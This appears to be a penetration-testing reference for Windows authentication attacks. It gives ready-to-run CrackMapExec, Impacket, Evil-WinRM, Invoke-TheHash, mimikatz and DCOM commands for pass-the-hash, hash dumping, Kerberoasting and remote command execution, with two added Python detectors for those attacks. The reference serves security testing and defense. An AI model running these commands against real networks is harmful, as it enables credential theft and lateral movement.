Authentication Mechanisms - Tools
This document provides an overview of essential tools for testing and interacting with various authentication mechanisms in Windows environments.
CrackMapExec (CME)
CrackMapExec is a post-exploitation tool that helps automate the assessment of large Active Directory networks.
Basic Usage
# Test credentials against SMB
crackmapexec smb 10.10.10.10 -u username -p password
# Test credentials against WinRM
crackmapexec winrm 10.10.10.10 -u username -p password
# Test credentials against SSH
crackmapexec ssh 10.10.10.10 -u username -p password
# Test credentials against MSSQL
crackmapexec mssql 10.10.10.10 -u username -p password
Pass-the-Hash
# SMB pass-the-hash
crackmapexec smb 10.10.10.10 -u username -H NTLM_HASH
# WinRM pass-the-hash
crackmapexec winrm 10.10.10.10 -u username -H NTLM_HASH
Authentication with Domain
# Specify domain for authentication
crackmapexec smb 10.10.10.10 -u username -p password -d domain.local
# Target a domain controller
crackmapexec smb dc01.domain.local -u username -p password -d domain.local
Network Sweeping
# Scan subnet for SMB
crackmapexec smb 10.10.10.0/24
# Scan subnet with credentials
crackmapexec smb 10.10.10.0/24 -u username -p password
Enumeration Functions
# Enumerate shares
crackmapexec smb 10.10.10.10 -u username -p password --shares
# Enumerate logged-on users
crackmapexec smb 10.10.10.10 -u username -p password --loggedon-users
# Enumerate domain users
crackmapexec smb 10.10.10.10 -u username -p password --users
# Enumerate domain groups
crackmapexec smb 10.10.10.10 -u username -p password --groups
# Get password policy
crackmapexec smb 10.10.10.10 -u username -p password --pass-pol
Command Execution
# Execute command via SMB
crackmapexec smb 10.10.10.10 -u username -p password -x "whoami /all"
# Execute PowerShell command
crackmapexec smb 10.10.10.10 -u username -p password -X '$PSVersionTable'
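On the receiving end, the credential tests and subnet sweeps above show up on targets as bursts of network logons (Security events 4624/4625, logon type 3, NTLM) from a single source address. The following is an added example, not part of the original page or of CrackMapExec, that summarises such events per source: it flags sources that fail many distinct usernames in a short window (credential testing) and sources that succeed against many distinct hosts in a short window (sweeping). The log lines are constructed in a flat key=value form for illustration and the thresholds are assumptions to tune per environment.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records (not real Windows log output). 10.10.14.5 fails
# six different usernames against DC01, then uses the one account that worked
# against several hosts in quick succession; 10.10.10.50 is an ordinary user
# reaching a file share with Kerberos.
SAMPLE_LOG = """\
2024-05-01T10:00:01 EventID=4625 Host=DC01 Src=10.10.14.5 User=alice LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:02 EventID=4625 Host=DC01 Src=10.10.14.5 User=bob LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:03 EventID=4625 Host=DC01 Src=10.10.14.5 User=carol LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:04 EventID=4625 Host=DC01 Src=10.10.14.5 User=dave LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:05 EventID=4625 Host=DC01 Src=10.10.14.5 User=erin LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:06 EventID=4625 Host=DC01 Src=10.10.14.5 User=frank LogonType=3 AuthPkg=NTLM
2024-05-01T10:00:07 EventID=4624 Host=DC01 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:00 EventID=4624 Host=WS01 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:01 EventID=4624 Host=WS02 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:02 EventID=4624 Host=WS03 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:03 EventID=4624 Host=WS04 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:05 EventID=4624 Host=WS05 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:01:06 EventID=4624 Host=FS01 Src=10.10.14.5 User=svc_backup LogonType=3 AuthPkg=NTLM
2024-05-01T10:02:00 EventID=4624 Host=FS01 Src=10.10.10.50 User=alice LogonType=3 AuthPkg=Kerberos
2024-05-01T10:03:00 EventID=4624 Host=FS01 Src=10.10.10.50 User=alice LogonType=3 AuthPkg=Kerberos
"""


def parse_event(line):
    """Turn one constructed '<timestamp> key=value ...' line into a dict."""
    ts, *pairs = line.split()
    event = dict(p.split("=", 1) for p in pairs)
    event["ts"] = datetime.fromisoformat(ts)
    event["EventID"] = int(event["EventID"])
    event["LogonType"] = int(event["LogonType"])
    return event


def parse_log(text):
    return [parse_event(line) for line in text.splitlines() if line.strip()]


def max_distinct_in_window(pairs, window):
    """pairs: list of (timestamp, value). Return the largest number of distinct
    values that fall inside any sliding window of the given length."""
    pairs = sorted(pairs)
    counts = defaultdict(int)
    best = left = 0
    for ts, value in pairs:
        counts[value] += 1
        while ts - pairs[left][0] > window:  # evict events older than the window
            old = pairs[left][1]
            counts[old] -= 1
            if counts[old] == 0:
                del counts[old]
            left += 1
        best = max(best, len(counts))
    return best


def _per_source(events, event_id, field, min_distinct, window):
    """Group network logons (type 3) of one event id by source address and
    report sources whose distinct values of `field` reach the threshold."""
    by_src = defaultdict(list)
    for e in events:
        if e["EventID"] == event_id and e["LogonType"] == 3:
            by_src[e["Src"]].append((e["ts"], e[field]))
    hits = {}
    for src, pairs in by_src.items():
        n = max_distinct_in_window(pairs, window)
        if n >= min_distinct:
            hits[src] = n
    return hits


def find_sweeps(events, min_hosts=5, window=timedelta(minutes=5)):
    """Sources with successful network logons (4624) to many distinct hosts."""
    return _per_source(events, 4624, "Host", min_hosts, window)


def find_sprays(events, min_users=5, window=timedelta(minutes=5)):
    """Sources with failed network logons (4625) for many distinct usernames."""
    return _per_source(events, 4625, "User", min_users, window)


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("sweeps (source -> distinct hosts):", find_sweeps(events))
    print("sprays (source -> distinct users):", find_sprays(events))
```

The sliding window matters: a service account that legitimately touches many hosts over a day should not trip the sweep rule, while the same count inside five minutes is what a subnet scan looks like. Logon type 3 with NTLM is also what a pass-the-hash logon produces, so the sweep rule covers the `-H` variants above as well.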
Impacket
Impacket is a collection of Python classes for working with network protocols; its bundled example scripts are particularly useful for testing Windows authentication.
PSExec
# Authenticate with password
impacket-psexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-psexec -hashes :NTLM_HASH domain.local/username@10.10.10.10
# Specify command to run
impacket-psexec domain.local/username:password@10.10.10.10 'ipconfig /all'
WMIExec
# Authenticate with password
impacket-wmiexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-wmiexec -hashes :NTLM_HASH domain.local/username@10.10.10.10
SMBExec
# Authenticate with password
impacket-smbexec domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-smbexec -hashes :NTLM_HASH domain.local/username@10.10.10.10
Secretsdump
# Remote dumping of hashes
impacket-secretsdump domain.local/username:password@10.10.10.10
# Pass-the-hash
impacket-secretsdump -hashes :NTLM_HASH domain.local/username@10.10.10.10
# Offline parse of saved registry hives: SAM hashes + LSA secrets + cached domain creds
impacket-secretsdump -sam sam.save -system system.save -security security.save LOCAL
GetNPUsers
# Find accounts that do not require Kerberos pre-authentication (AS-REP roasting)
impacket-GetNPUsers domain.local/ -dc-ip 10.10.10.10 -usersfile users.txt -format hashcat
# With specific user
impacket-GetNPUsers domain.local/username -dc-ip 10.10.10.10
GetUserSPNs
# Kerberoasting - request service tickets
impacket-GetUserSPNs domain.local/username:password -dc-ip 10.10.10.10 -request
# Output in specific format
impacket-GetUserSPNs domain.local/username:password -dc-ip 10.10.10.10 -request -format hashcat
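Both GetNPUsers and GetUserSPNs leave a distinctive trace on the domain controller: AS-REP roasting produces a 4768 (TGT requested) event with pre-authentication type 0, and Kerberoasting produces a burst of 4769 (service ticket requested) events from one client that ask for RC4 (etype 0x17) tickets to several non-machine SPN accounts, since that is the encryption type both `-format hashcat` outputs are built for. The following is an added example, not part of the original page or of Impacket, that applies those two checks to a constructed list of DC events; the record field names and the thresholds are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample DC events (not real log output). Field names loosely
# follow the 4768 (TGT request) and 4769 (service ticket request) events.
SAMPLE_EVENTS = [
    # AS-REP roasting: TGT issued with no pre-authentication, RC4 ticket
    {"ts": "2024-05-01T11:00:00", "id": 4768, "account": "jdoe", "client": "10.10.14.5",
     "preauth": 0, "enc": 0x17},
    # normal TGT request: pre-auth with encrypted timestamp (2), AES (0x12)
    {"ts": "2024-05-01T11:00:05", "id": 4768, "account": "alice", "client": "10.10.10.50",
     "preauth": 2, "enc": 0x12},
    # Kerberoasting: one client asks for RC4 service tickets to several SPN accounts
    {"ts": "2024-05-01T11:05:00", "id": 4769, "account": "alice", "client": "10.10.14.5",
     "service": "svc_sql", "enc": 0x17},
    {"ts": "2024-05-01T11:05:01", "id": 4769, "account": "alice", "client": "10.10.14.5",
     "service": "svc_web", "enc": 0x17},
    {"ts": "2024-05-01T11:05:02", "id": 4769, "account": "alice", "client": "10.10.14.5",
     "service": "svc_backup", "enc": 0x17},
    # machine-account service ticket with AES: routine, ignored
    {"ts": "2024-05-01T11:05:03", "id": 4769, "account": "alice", "client": "10.10.14.5",
     "service": "WS05$", "enc": 0x12},
    # ordinary user reaching SQL with an AES ticket
    {"ts": "2024-05-01T11:06:00", "id": 4769, "account": "bob", "client": "10.10.10.50",
     "service": "svc_sql", "enc": 0x12},
]

RC4_HMAC = 0x17  # Kerberos etype 23; the ticket type roasting tools ask for


def find_asrep_roasting(events):
    """Accounts that received a TGT without pre-authentication
    (4768 with pre-authentication type 0)."""
    return sorted({e["account"] for e in events
                   if e["id"] == 4768 and e["preauth"] == 0})


def find_kerberoasting(events, min_services=3, window=timedelta(minutes=10)):
    """Clients that requested RC4 service tickets for several distinct
    non-machine SPN accounts inside one time window.
    Returns {client: [service accounts...]}."""
    by_client = defaultdict(list)
    for e in events:
        if e["id"] != 4769 or e["enc"] != RC4_HMAC or e["service"].endswith("$"):
            continue
        by_client[e["client"]].append((datetime.fromisoformat(e["ts"]), e["service"]))
    hits = {}
    for client, reqs in by_client.items():
        reqs.sort()
        services = {svc for _, svc in reqs}
        span = reqs[-1][0] - reqs[0][0]  # time between first and last request
        if len(services) >= min_services and span <= window:
            hits[client] = sorted(services)
    return hits


if __name__ == "__main__":
    print("AS-REP roastable accounts seen:", find_asrep_roasting(SAMPLE_EVENTS))
    print("Kerberoasting clients:", find_kerberoasting(SAMPLE_EVENTS))
```

Machine accounts (names ending in `$`) are excluded because workstations request service tickets for each other constantly and their passwords are not crackable in practice; the etype filter is what separates a roasting run from ordinary AES traffic. The mitigation side follows directly: remove the "do not require pre-authentication" flag where it is set, and give service accounts long passwords or move them to group managed service accounts so an RC4 ticket is not worth cracking.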
Evil-WinRM
Evil-WinRM is an interactive shell over Windows Remote Management (WinRM) built for pentesting.
Basic Usage
# Connect with password
evil-winrm -i 10.10.10.10 -u username -p password
# Pass-the-hash
evil-winrm -i 10.10.10.10 -u username -H NTLM_HASH
# Specify domain
evil-winrm -i 10.10.10.10 -u username@domain.local -p password
Advanced Features
# Load PowerShell scripts
evil-winrm -i 10.10.10.10 -u username -p password -s /path/to/ps_scripts/
# Upload file
# (After connecting, use upload command)
*Evil-WinRM> upload /local/path/file.exe C:\Windows\Temp\file.exe
# Download file
*Evil-WinRM> download C:\Windows\Temp\file.exe /local/path/file.exe
# PowerShell menu
*Evil-WinRM> menu
# Load and run a local .NET binary in memory on the target without touching its disk
*Evil-WinRM> Invoke-Binary /path/to/binary.exe
Invoke-TheHash
Invoke-TheHash provides PowerShell functions for performing pass-the-hash attacks with WMI and SMB.
Installation
# Import the module
Import-Module .\Invoke-TheHash.psd1
SMB Command Execution
# Execute command via SMB using NTLM hash
Invoke-SMBExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -Verbose
# Get command output
Invoke-SMBExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -CommandOutput $true -Verbose
WMI Command Execution
# Execute command via WMI using NTLM hash
Invoke-WMIExec -Target 10.10.10.10 -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -Verbose
Mass Command Execution
# Execute on multiple targets via SMB
$targets = Get-Content .\targets.txt
foreach ($target in $targets) {
    Invoke-SMBExec -Target $target -Domain domain.local -Username username -Hash NTLM_HASH -Command "whoami" -Verbose
}
Lateral Movement Techniques
RDP with Stolen Credentials
# Using xfreerdp
xfreerdp /v:10.10.10.10 /u:username /p:password /d:domain.local +clipboard
# Pass-the-hash with mimikatz
sekurlsa::pth /user:username /domain:domain.local /ntlm:NTLM_HASH /run:"mstsc /restrictedadmin"
DCOM Lateral Movement
# Instantiate the MMC20.Application COM object on the remote host over DCOM
$dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application", "10.10.10.10"))
# Execute command
$dcom.Document.ActiveView.ExecuteShellCommand("cmd.exe", $null, "/c whoami > C:\Windows\Temp\output.txt", "7")
Common Troubleshooting
# Verify SMB connectivity
crackmapexec smb 10.10.10.10 --shares
# Check for WinRM connectivity
crackmapexec winrm 10.10.10.10
# Test credential validity without execution
crackmapexec smb 10.10.10.10 -u username -p password